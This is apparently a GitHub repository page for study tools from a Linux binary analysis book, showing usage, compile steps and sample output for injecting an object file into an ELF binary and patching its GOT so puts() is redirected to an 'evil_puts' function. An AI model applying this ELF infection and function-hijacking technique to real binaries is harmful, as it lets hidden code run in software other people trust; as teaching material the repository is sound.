-
Notifications
You must be signed in to change notification settings - Fork 1
BobBurns/elf-hijacking
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
A couple of programs to use when reading Chapter 2 Learning Linux Binary Analysis by Ryan "Elfmaster" O'Neill Usage: ./relocate <bin> <obj> ex. ./relocate htest eputs.o then ./hijack .zyx.tmp.bin puts <vaddr of eputs from reloc output> Note: result bin is not renamed, so infected elf is .zyx.tmp.bin to use multiple times be sure to make clean to rm .zyx.tmp.bin Compile: for relocate use make for hijack gcc -o hijack hijack.c for eputs.o gcc -c eputs.c for htest gcc -o htest htest.c Resources: https://github.com/elfmaster/skeksi_virus/blob/master/virus.c http://bitlackeys.org/projects/quenya_32bit.tgz https://www.packtpub.com/networking-and-servers/learning-linux-binary-analysis Tested on bob@bob-ThinkPad-X1-Carbon-3rd ~/Pen/elf-hijacking $ uname -a Linux bob-ThinkPad-X1-Carbon-3rd 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux Example output: bob@bob-ThinkPad-X1-Carbon-3rd ~/Pen/elf-hijacking $ ./relocate htest eputs.o [+] loading object eputs.o [+] Adjust Section Addr [1] 0x004006fc [+] Adjust Section Addr [3] 0x0040074b [+] Adjust Section Addr [5] 0x0040074b [+] Adjust Section Addr [6] 0x0040076b [+] Adjust Section Addr [7] 0x004007a0 [+] Adjust Section Addr [8] 0x004007a0 [+] Target Addr: 0x0040073a [+] RelVal 0x0040074b [+] Reloc ptr (R_X86_64) 0x0040074b [+] Section Header Reloc 0x0040074b addr: 0x40073a [+] Target Addr: 0x00400744 [+] RelVal 0x004006fc [+] Reloc ptr (R_X86_64_PC32) 0xffffffb4 [+] Section Header Reloc 0x004006fc _write addr: 0x400744 [+] Target Addr: 0x004007c0 [+] RelVal 0x004006fc [+] Reloc ptr (R_X86_64_PC32) 0xffffff3c [+] Section Header Reloc 0x004006fc addr: 0x4007c0 [+] Target Addr: 0x004007e0 [+] RelVal 0x004006fc [+] Reloc ptr (R_X86_64_PC32) 0xffffff50 [+] Section Header Reloc 0x004006fc addr: 0x4007e0 [+] memcpy to Objcode 79 bytes [+] memcpy to Objcode 0 bytes [+] memcpy to Objcode 32 bytes [+] memcpy to Objcode 53 bytes [+] memcpy to Objcode 0 bytes [+] memcpy to Objcode 88 bytes [+] Injected code at = 0x004006fc [+] Found symtab: _write addr: 0x6d4e8218 [+] Add symbol: _write, vaddr 0x004006fc [+] Sym vaddr: 0x004006fc [+] Sym Offset: 0x000026d0 [+] Sym Offset: 0x00000018 [+] Write sym ok. [+] Found symtab: evil_puts addr: 0x6d4e8230 [+] Add symbol: evil_puts, vaddr 0x00400730 [+] Sym vaddr: 0x00400730 [+] Sym Offset: 0x000026e8 [+] Sym Offset: 0x00000018 [+] Write sym ok. success! bob@bob-ThinkPad-X1-Carbon-3rd ~/Pen/elf-hijacking $ ./hijack .zyx.tmp.bin puts 0x00400730 [+] strtab: 0x23dc1318 [+] symtab: 0x23dc12b8 [+] pltgot: 0x23dc3000 [+] puts symbol index: 1 [+] gotaddr: 0x00601018 gotoff: 0x00002018 [+] patched GOT entry 0x00601018 with address 0x00400730 [+} Success! bob@bob-ThinkPad-X1-Carbon-3rd ~/Pen/elf-hijacking $ ./.zyx.tmp.bin HAHA puts() has been hijacked! bob@bob-ThinkPad-X1-Carbon-3rd ~/Pen/elf-hijacking $
About
Testing Chapter 2 Learning Linux Binary Analysis
Resources
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published